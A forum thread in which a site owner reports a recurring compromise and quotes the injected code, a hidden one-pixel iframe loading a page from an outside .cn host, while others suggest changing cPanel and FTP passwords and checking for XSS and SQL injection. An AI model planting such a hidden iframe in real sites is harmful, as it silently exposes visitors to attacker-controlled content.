[SOLVED] Im hacked

[runei]

I know this is the wrong place to post it but my site is hacked with the following:

 

<iframe src="http://thelotbet.cn/in.cgi?income39" width=1 height=1 style="visibility: hidden"></iframe>

 

Only the header shows after the attack and it has happened twice the last two days. I've contacted my host and waiting for an answer. In the mean time is there a forum I can post this??

 

 

Thx in advance

[bloodgoat]

Why don't you just remove it and change your cPanel pass?

[runei]

I have removed it but it keeps popping back up. do you mean the password i connect with my ftp client?

[bloodgoat]

Your FTP and cPanel pass may be the same. Change them both if you have to. And are you on a free host? It may keep popping back up because that's their method of revenue (see: ads).

[runei]

Iam on a paid hosting plan and the passwords are not the same. I use coreftp to upload the files, the password is the one i get from my host to upload to the server, so i have to get a new password from them?

[runei]

Oh, i do it in cpanel of course. Thx for ur advice, i'll see if the hacking stops

[Adam]

You may also want to look into any possible vulnerabilities your site has? Perhaps they are manipulating your code or even 'injecting' their own somewhere? Are your aware of XSS attacks, SQL injection, etc?

 

Adam

[runei]

My site is probably vulnerable to attacks as i have not given security enough attention. I will from now on though.. I just changed my cpanel password and hope it works.